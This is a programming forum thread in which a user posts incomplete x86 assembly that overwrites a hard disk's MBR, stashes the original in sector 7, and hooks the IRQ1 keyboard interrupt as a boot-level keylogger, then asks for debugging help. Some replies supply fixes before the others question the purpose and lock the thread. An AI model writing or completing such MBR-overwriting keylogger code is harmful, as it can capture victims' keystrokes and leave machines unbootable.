hook irq1 installed at MBR

Programming, for all ages and all languages.
Locked
Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

hook irq1 installed at MBR

Post by Apolo »

i am coding a program that hook teh IRQ 1 and is installed onto MBR and restore teh original MBR that is saved at sector 7 however the OS don't bootstrap. here is my code:

Code: Select all

org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET

int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]

...

mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...

mov		si,3100h
mov		al,10h
mov		[si],al
mov		al,0
mov		[si+1],al
mov		al,01
mov		[si+2],al
mov           al,0
mov		[si+3],al
MOV		AX,7C00H
mov		[si+4],ax
mov		ax,0h
mov		[si+6],ax
mov		ax,7
mov		[si+8],ax
xor		ax,ax
mov		[si+0ah],ax
mov		[si+0ch],ax
mov		[si+0eh],ax

mov		ah,42h
mov		dl,80h
INT		13H 


JMP           0:7C00H

Where is wrong at my code above???
User avatar
iansjack
Member
Member
Posts: 4689
Joined: Sat Mar 31, 2012 3:07 am
Location: Chichester, UK

Re: hook irq1 installed at MBR

Post by iansjack »

You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first
User avatar
AJ
Member
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK
Contact:

Re: hook irq1 installed at MBR

Post by AJ »

Hi,

In addition to iansjack's post, we have eabsolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive).

We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?

Cheers,
Adam
Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

Re: hook irq1 installed at MBR

Post by Apolo »

my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?
User avatar
iansjack
Member
Member
Posts: 4689
Joined: Sat Mar 31, 2012 3:07 am
Location: Chichester, UK

Re: hook irq1 installed at MBR

Post by iansjack »

I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.

And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.
User avatar
Brendan
Member
Member
Posts: 8561
Joined: Sat Jan 15, 2005 12:00 am
Location: At his keyboard!
Contact:

Re: hook irq1 installed at MBR

Post by Brendan »

Hi,
Apolo wrote:my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?
To clear the direction flag, use the CLD instruction.

The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assemebler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulful the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.

For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.

Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.


Cheers,

Brendan
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.
User avatar
AJ
Member
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK
Contact:

Re: hook irq1 installed at MBR

Post by AJ »

That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT and chances are your code will end up in an in-mapped memory page anyway.

You'd generally be better off with a hardware key logger but what you are doing may be at best immoral and at worst illegal :!:

Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine.

Cheers,
Adam
Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

Re: hook irq1 installed at MBR

Post by Apolo »

i think BIOS of my PCs is all infected because i try this code most simple but the PCs don't bootsrap however. see my most simple code:

Code: Select all

start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET

example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx

codesize:
Aaaaaaaaa! what is the problem of my code? :x
User avatar
iansjack
Member
Member
Posts: 4689
Joined: Sat Mar 31, 2012 3:07 am
Location: Chichester, UK

Re: hook irq1 installed at MBR

Post by iansjack »

The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.
User avatar
AJ
Member
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK
Contact:

Re: hook irq1 installed at MBR

Post by AJ »

You one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.

Cheers,
Adam
Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

Re: hook irq1 installed at MBR

Post by Apolo »

resume:

i am trying to bootstrap from sector 7 that is where teh original MBR is writed. can someone help me?? i am desesperate!
User avatar
AJ
Member
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK
Contact:

Re: hook irq1 installed at MBR

Post by AJ »

Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...
Locked